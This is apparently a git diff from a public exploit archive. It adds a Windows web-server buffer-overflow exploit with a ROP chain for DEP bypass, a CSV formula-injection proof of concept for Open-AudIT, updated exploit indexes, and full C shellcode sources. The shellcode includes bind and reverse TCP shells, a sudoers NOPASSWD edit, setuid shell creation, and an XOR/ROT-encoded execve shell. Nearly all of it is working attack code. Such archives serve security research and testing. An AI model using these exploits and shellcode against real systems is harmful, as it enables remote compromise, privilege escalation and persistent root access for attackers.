+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+
+# ECX = lpOldProtect (ptr to W address)
+buffer += struct.pack('<L', 0x1001b377)      # POP ECX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x61c730ad)      # &Writable location [sqlite3.dll]
+
+# EBX = dwSize (0x00000501)
+buffer += struct.pack('<L', 0x10015442)	     # POP EAX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0xfffffaff)      # will become 0x00000501 after negate
+buffer += struct.pack('<L', 0x100231d1)	     # NEG EAX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x1001da09)      # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]
+buffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]
+buffer += struct.pack('<L', 0x10015442)	     # POP EAX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x61c730ad)      # &Writable location [sqlite3.dll]
+
+# EDI = ROP NOP (RETN)
+buffer += struct.pack('<L', 0x10019f47)      # POP EDI # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]
+
+# EAX = NOP (0x90909090)
+buffer += struct.pack('<L', 0x10015442)      # POP EAX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x90909090)      # nop
+buffer += struct.pack('<L', 0x100240c2)      # PUSHAD # RETN [ImageLoad.dll]
+
+buffer += "\x90" * 50                        # nop
+buffer += shellcode                          # calc.exe
+buffer += "\x90" * 50                        # nop
+
+buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100) 
+buffer += '\x42' * 4                         # nSEH filler
+
+# stack pivot that will land somewhere in buffer of As
+buffer += struct.pack('<L', 0x10022869)      # SEH ADD ESP,1004 # RETN [ImageLoad.dll]
+
+buffer += '\x44' * (5000-4059-4-4)
+
+print "[+] Sending %s bytes of evil payload.." %len(buffer)
+time.sleep(1)
+
+try:
+	cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
+	data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
+	requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
+except:
+	print "The server stopped responding. You should see calc.exe by now ;D"
\ No newline at end of file
diff --git a/exploits/windows/webapps/44511.txt b/exploits/windows/webapps/44511.txt
new file mode 100644
index 000000000..58bbcbbc1
--- /dev/null
+++ b/exploits/windows/webapps/44511.txt
@@ -0,0 +1,50 @@
+Hi Guys,
+
+#######################################
+# Exploit Title: Open-AudIT 2.1 - CSV Macro Injection Vulnerability
+# Google Dork: N/A
+# Date: 21-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: https://opmantek.com
+# Software Link: https://www.open-audit.org/downloads.php
+# Affected Version: 2.1
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : CVE-2018-9137
+#######################################
+
+1. Vendor Description:
+
+Open-AudIT intelligently scans an organization’s network and stores the
+configurations of the discovered devices.
+
+A powerful reporting framework enables information such as software
+licensing, configuration changes, non-authorized devices, capacity
+utilization and hardware warranty status to be extracted and explored.
+
+Open-AudIT Enterprise comes with additional features including Business
+Dashboards, Report filtering, Scheduled discovery, Scheduled Reports and
+Maps.
+
+2. Technical Description:
+
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+the export feature in the OpenAudIT before 2.2 via a value that is
+mishandled in a CSV export.
+
+3. Proof of Concept:
+
+Login and Navigate to the any field which is having export feature and
+create an entry with @SUM(1+1)*cmd|' /C calc'!A0.
+
+When user logged in and exported user data then the CSV
+Formula gets executed and calculator will get popped in his machine.
+
+4. Solution:
+
+Update to latest version
+
+https://www.open-audit.org/downloads.php
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fc31b6a22..fb06d0f32 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5942,6 +5942,15 @@ id,file,description,date,author,type,platform,port
 44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
 44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
 44500,exploits/windows_x86/dos/44500.py,"PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)",2018-04-23,luriel,dos,windows_x86,
+44519,exploits/linux/dos/44519.txt,"gif2apng 1.9 - '.gif' Stack Buffer Overflow",2018-04-24,Hamm3r.py,dos,linux,
+44514,exploits/windows/dos/44514.py,"VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC)",2018-04-24,SivertPL,dos,windows,
+44521,exploits/linux/dos/44521.py,"Kaspersky KSN for Linux 5.2 - Memory Corruption",2018-04-24,"Juan Sacco",dos,linux,
+44525,exploits/windows/dos/44525.py,"Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service",2018-04-24,hyp3rlinx,dos,windows,
+44526,exploits/multiple/dos/44526.txt,"Adobe Flash - Overflow when Playing Sound",2018-04-24,"Google Security Research",dos,multiple,
+44527,exploits/multiple/dos/44527.txt,"Adobe Flash - Overflow in Slab Rendering",2018-04-24,"Google Security Research",dos,multiple,
+44528,exploits/multiple/dos/44528.txt,"Adobe Flash - Info Leak in Image Inflation",2018-04-24,"Google Security Research",dos,multiple,
+44529,exploits/multiple/dos/44529.txt,"Adobe Flash - Out-of-Bounds Write in blur Filtering",2018-04-24,"Google Security Research",dos,multiple,
+44530,exploits/multiple/dos/44530.js,"Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion",2018-04-24,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9667,6 +9676,9 @@ id,file,description,date,author,type,platform,port
 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
+44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
+44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows,
+44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16419,6 +16431,8 @@ id,file,description,date,author,type,platform,port
 44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
 44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
 44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
+44522,exploits/windows/remote/44522.py,"Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass)",2018-04-24,"Hashim Jawad",remote,windows,
+44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Auth Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39194,3 +39208,11 @@ id,file,description,date,author,type,platform,port
 44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
 44501,exploits/php/webapps/44501.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure",2018-04-23,"Larry W. Cashdollar",webapps,php,
 44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,
+44503,exploits/php/webapps/44503.txt,"UK Cookie Consent - Persistent Cross-Site Scripting",2018-04-24,B0UG,webapps,php,
+44504,exploits/php/webapps/44504.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery",2018-04-24,jiguang,webapps,php,
+44511,exploits/windows/webapps/44511.txt,"Open-AudIT 2.1 - CSV Macro Injection",2018-04-24,"Sureshbabu Narvaneni",webapps,windows,
+44512,exploits/php/webapps/44512.txt,"Monstra CMS 3.0.4 - Arbitrary Folder Deletion",2018-04-24,"Wenming Jiang",webapps,php,
+44513,exploits/php/webapps/44513.py,"Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass",2018-04-24,devcoinfet,webapps,php,
+44515,exploits/php/webapps/44515.py,"Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure",2018-04-24,"Berk Cem Göksel",webapps,php,
+44520,exploits/php/webapps/44520.html,"WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion",2018-04-24,"Lenon Leite",webapps,php,80
+44531,exploits/java/webapps/44531.txt,"WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting",2018-04-24,"SEC Consult",webapps,java,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 0634f8535..eeb821cac 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -874,3 +874,9 @@ id,file,description,date,author,type,platform
 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
 44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
+44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
+44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode",2018-04-24,absolomb,shellcode,linux_x86
+44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
+44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
+44510,shellcodes/linux_x86/44510.c,"Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
+44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44505.c b/shellcodes/linux_x86/44505.c
new file mode 100644
index 000000000..7cd742364
--- /dev/null
+++ b/shellcodes/linux_x86/44505.c
@@ -0,0 +1,81 @@
+/**
+# Linux x86 Bind TCP shellcode
+# This shellcode will listen on port 1337 and give you /bin/sh
+# Shellcode Author: Anurag Srivastava
+# Shellcode Length: 92
+# Student-ID: SLAE-1219
+# Note ~ http://www.theanuragsrivastava.in/2018/04/bind-tcp-shellcode-x86-slae-assignment.html
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	6a 66                	push   0x66
+ 8048062:	58                   	pop    eax
+ 8048063:	31 db                	xor    ebx,ebx
+ 8048065:	53                   	push   ebx
+ 8048066:	43                   	inc    ebx
+ 8048067:	53                   	push   ebx
+ 8048068:	6a 02                	push   0x2
+ 804806a:	89 e1                	mov    ecx,esp
+ 804806c:	99                   	cdq    
+ 804806d:	cd 80                	int    0x80
+ 804806f:	96                   	xchg   esi,eax
+ 8048070:	52                   	push   edx
+ 8048071:	66 68 05 39          	pushw  0x3905
+ 8048075:	43                   	inc    ebx
+ 8048076:	66 53                	push   bx
+ 8048078:	89 e1                	mov    ecx,esp
+ 804807a:	6a 10                	push   0x10
+ 804807c:	51                   	push   ecx
+ 804807d:	56                   	push   esi
+ 804807e:	89 e1                	mov    ecx,esp
+ 8048080:	6a 66                	push   0x66
+ 8048082:	58                   	pop    eax
+ 8048083:	cd 80                	int    0x80
+ 8048085:	53                   	push   ebx
+ 8048086:	6a 04                	push   0x4
+ 8048088:	5b                   	pop    ebx
+ 8048089:	56                   	push   esi
+ 804808a:	89 e1                	mov    ecx,esp
+ 804808c:	6a 66                	push   0x66
+ 804808e:	58                   	pop    eax
+ 804808f:	cd 80                	int    0x80
+ 8048091:	52                   	push   edx
+ 8048092:	52                   	push   edx
+ 8048093:	56                   	push   esi
+ 8048094:	89 e1                	mov    ecx,esp
+ 8048096:	43                   	inc    ebx
+ 8048097:	6a 66                	push   0x66
+ 8048099:	58                   	pop    eax
+ 804809a:	cd 80                	int    0x80
+ 804809c:	93                   	xchg   ebx,eax
+ 804809d:	6a 02                	push   0x2
+ 804809f:	59                   	pop    ecx
+
+080480a0 <loop>:
+ 80480a0:	6a 3f                	push   0x3f
+ 80480a2:	58                   	pop    eax
+ 80480a3:	cd 80                	int    0x80
+ 80480a5:	49                   	dec    ecx
+ 80480a6:	79 f8                	jns    80480a0 <loop>
+ 80480a8:	31 c9                	xor    ecx,ecx
+ 80480aa:	51                   	push   ecx
+ 80480ab:	6a 0b                	push   0xb
+ 80480ad:	58                   	pop    eax
+ 80480ae:	68 2f 2f 73 68       	push   0x68732f2f
+ 80480b3:	68 2f 62 69 6e       	push   0x6e69622f
+ 80480b8:	89 e3                	mov    ebx,esp
+ 80480ba:	cd 80                	int    0x80
+
+**/
+
+#include<stdio.h>
+#include<string.h>
+unsigned char code[] = \
+"\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x99\xcd\x80\x96\x52\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x53\x6a\x04\x5b\x56\x89\xe1\x6a\x66\x58\xcd\x80\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+  int (*ret)() = (int(*)())code;
+  ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44507.c b/shellcodes/linux_x86/44507.c
new file mode 100644
index 000000000..16d051952
--- /dev/null
+++ b/shellcodes/linux_x86/44507.c
@@ -0,0 +1,71 @@
+/*
+
+Title: Edit /etc/sudoers with NOPASSWD for ALL
+Date: 2018-04-19
+Author: absolomb
+Website: https://www.sploitspren.com
+SLAE-ID: 1208
+Purpose: edit /etc/sudoers with ALL ALL=(ALL) NOPASSWD: ALL
+Tested On: Ubuntu 14.04 
+Arch: x86
+Size: 79 bytes
+
+Shellcode is register independent and null free.
+
+global _start
+
+section .text
+
+_start:
+
+	xor edx, edx		; clear edx
+	xor ecx, ecx		; clear ecx
+	push edx		; terminating NULL
+	push 0x7372656f 	; "sreo"
+	push 0x6475732f		; "dus/"
+	push 0x6374652f		; "cte/"
+	mov ebx, esp		; point ebx to stack
+	inc ecx			; ecx to 1
+	mov ch, 0x4		; ecx to 401 O_WRONLY | O_APPEND
+	push 0x5		; open()
+	pop eax			
+	int 0x80		; execute open
+	xchg ebx, eax		; save fd in ebx
+	
+	jmp short setup
+
+	;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len);
+
+	
+write:
+	pop ecx			; pop "ALL ALL=(ALL) NOPASSWD: ALL"
+	mov dl, 0x1c		; len 28
+	push 0x4		; write()
+	pop eax		
+	int 0x80		; execute write
+
+	push 0x1		; exit ()
+	pop eax
+	int 0x80
+	
+setup:
+	call write
+	db "ALL ALL=(ALL) NOPASSWD: ALL" , 0xa
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xd2\x31\xc9\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\x6a\x05\x58\xcd\x80\x93\xeb\x0d\x59\xb2\x1c\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xee\xff\xff\xff\x41\x4c\x4c\x20\x41\x4c\x4c\x3d\x28\x41\x4c\x4c\x29\x20\x4e\x4f\x50\x41\x53\x53\x57\x44\x3a\x20\x41\x4c\x4c\x0a";
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44508.c b/shellcodes/linux_x86/44508.c
new file mode 100644
index 000000000..fc5a49c92
--- /dev/null
+++ b/shellcodes/linux_x86/44508.c
@@ -0,0 +1,68 @@
+/**
+# Linux x86 Reverse TCP shellcode
+# 127.1.1.1/5555
+# Shellcode Author: Anurag Srivastava
+# Shellcode Length: 73
+# Student-ID: SLAE-1219
+# Note ~ http://www.theanuragsrivastava.in/2018/04/reverse-tcp-shellcode-x86-slae.html
+
+
+reverse:     file format elf32-i386
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	6a 66                	push   0x66
+ 8048062:	58                   	pop    eax
+ 8048063:	31 db                	xor    ebx,ebx
+ 8048065:	53                   	push   ebx
+ 8048066:	43                   	inc    ebx
+ 8048067:	53                   	push   ebx
+ 8048068:	6a 02                	push   0x2
+ 804806a:	89 e1                	mov    ecx,esp
+ 804806c:	99                   	cdq    
+ 804806d:	cd 80                	int    0x80
+ 804806f:	93                   	xchg   ebx,eax
+ 8048070:	59                   	pop    ecx
+
+08048071 <loop>:
+ 8048071:	6a 3f                	push   0x3f
+ 8048073:	58                   	pop    eax
+ 8048074:	cd 80                	int    0x80
+ 8048076:	49                   	dec    ecx
+ 8048077:	79 f8                	jns    8048071 <loop>
+ 8048079:	68 7f 01 01 01       	push   0x101017f
+ 804807e:	66 68 15 b3          	pushw  0xb315
+ 8048082:	66 6a 02             	pushw  0x2
+ 8048085:	89 e1                	mov    ecx,esp
+ 8048087:	6a 10                	push   0x10
+ 8048089:	51                   	push   ecx
+ 804808a:	53                   	push   ebx
+ 804808b:	89 e1                	mov    ecx,esp
+ 804808d:	6a 66                	push   0x66
+ 804808f:	58                   	pop    eax
+ 8048090:	6a 03                	push   0x3
+ 8048092:	5b                   	pop    ebx
+ 8048093:	cd 80                	int    0x80
+ 8048095:	31 c9                	xor    ecx,ecx
+ 8048097:	51                   	push   ecx
+ 8048098:	6a 0b                	push   0xb
+ 804809a:	58                   	pop    eax
+ 804809b:	68 2f 2f 73 68       	push   0x68732f2f
+ 80480a0:	68 2f 62 69 6e       	push   0x6e69622f
+ 80480a5:	89 e3                	mov    ebx,esp
+ 80480a7:	cd 80                	int    0x80
+
+**/
+
+#include<stdio.h>
+#include<string.h>
+unsigned char code[] = \
+"\x6a\x66\x58\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x99\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x7f\x01\x01\x01\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\x6a\x66\x58\x6a\x03\x5b\xcd\x80\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+  int (*ret)() = (int(*)())code;
+  ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44509.c b/shellcodes/linux_x86/44509.c
new file mode 100644
index 000000000..9e2235291
--- /dev/null
+++ b/shellcodes/linux_x86/44509.c
@@ -0,0 +1,47 @@
+/*
+
+Title: chmod 4755 /bin/dash
+Author: absolomb
+Website: https://www.sploitspren.com
+SLAE-ID: 1208
+Purpose: setuid bit on /bin/dash
+Tested On: Ubuntu 14.04 
+Arch: x86
+Size: 33 bytes
+
+global _start
+ 
+section .text
+ 
+_start:
+ 
+    cdq			; edx to 0
+    push edx		; terminating NULL
+    push 0x68736164	; 'hsad'
+    push 0x2f6e6962	; '/nib'
+    push 0x2f2f2f2f	; '////'
+    mov ebx, esp	; point ebx to stack
+    mov cx, 0x9ed	; 4755
+    push 0xf		; chmod()
+    pop eax		
+    int 0x80		; execute chmod()
+    push 0x1		; exit()
+    pop eax
+    int 0x80		; execute exit()
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x99\x52\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x66\xb9\xed\x09\x6a\x0f\x58\xcd\x80\x6a\x01\x58\xcd\x80";
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44510.c b/shellcodes/linux_x86/44510.c
new file mode 100644
index 000000000..5ea5f3df4
--- /dev/null
+++ b/shellcodes/linux_x86/44510.c
@@ -0,0 +1,60 @@
+/*
+
+Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
+Author: absolomb
+Website: https://www.sploitspren.com
+SLAE-ID: 1208
+Purpose: cp shell into /tmp and setuid
+Tested On: Ubuntu 14.04 
+Arch: x86
+Size: 74 bytes
+
+Shellcode is register independent and null free.  
+
+global _start			
+
+section .text
+_start:
+
+	push 0xb		; execve()		
+	pop eax			;
+	cdq    			; set edx to 0
+	push edx		; NULL
+	push word 0x632d	; "c-"	
+	mov edi,esp		; point edi to stack
+	push edx		; NULL
+	push 0x68732f2f		; "hs//"
+	push 0x6e69622f		; "/bin"
+	mov ebx,esp		; point ebx to stack
+	push edx		; NULL
+
+	jmp short cmd
+
+execute:
+
+	push edi		; "c-"
+	push ebx		; "/bin/sh"
+	mov ecx,esp		; point to stack
+	int 0x80		; execute execve
+
+
+cmd:
+	call execute
+	db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x63\x70\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x73\x20\x2f\x74\x6d\x70\x2f\x73\x68";
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/44517.c b/shellcodes/linux_x86/44517.c
new file mode 100644
index 000000000..7e5070c69
--- /dev/null
+++ b/shellcodes/linux_x86/44517.c
@@ -0,0 +1,54 @@
+/*
+; Title     : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR
+; Date      : April, 2018
+; Author    : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/
+; Twitter   : @nunof11
+; SLAE ID   : SLAE-1112
+; Size      : 44 bytes
+; Tested on : i686 GNU/Linux
+
+NASM:
+
+section .text
+
+global _start
+
+_start:
+  jmp short call_decoder
+
+decoder:
+  pop esi ; pop the Shellcode address from the Stack
+  xor ecx, ecx
+  mov cl, shellcodelen ; Set the loop counter to shellcodelen
+  
+decode:
+  rol byte [esi], 0x2 ; Left Shift 2 
+  xor byte [esi], cl  ; XOR the byte with the ecx (counter)
+  sub byte [esi], 13  ; Undo ROT13
+
+  inc esi ; increment the offset (iterate over the bytes)
+  loop decode ; loop while zero flag not set
+
+  jmp short Shellcode
+
+call_decoder:
+  call decoder ; Shellcode address will be pushed into the Stack
+  Shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23
+  shellcodelen  equ  $-Shellcode
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+"\xeb\x12\x5e\x31\xc9\xb1\x13\xc0\x06\x02\x30\x0e\x80\x2e\x0d\x46\xe2\xf5\xeb\x05\xe8\xe9\xff\xff\xff\x4b\xf7\x13\x59\xcc\x8c\x63\x5e\x9f\x8d\x99\x9f\x1f\xa4\x3b\x6e\xc6\x36\x23";
+
+void main()
+{
+    printf("Shellcode Length:  %d\n", strlen(shellcode));
+    
+    int (*ret)() = (int(*)())shellcode;
+    ret();
+}
\ No newline at end of file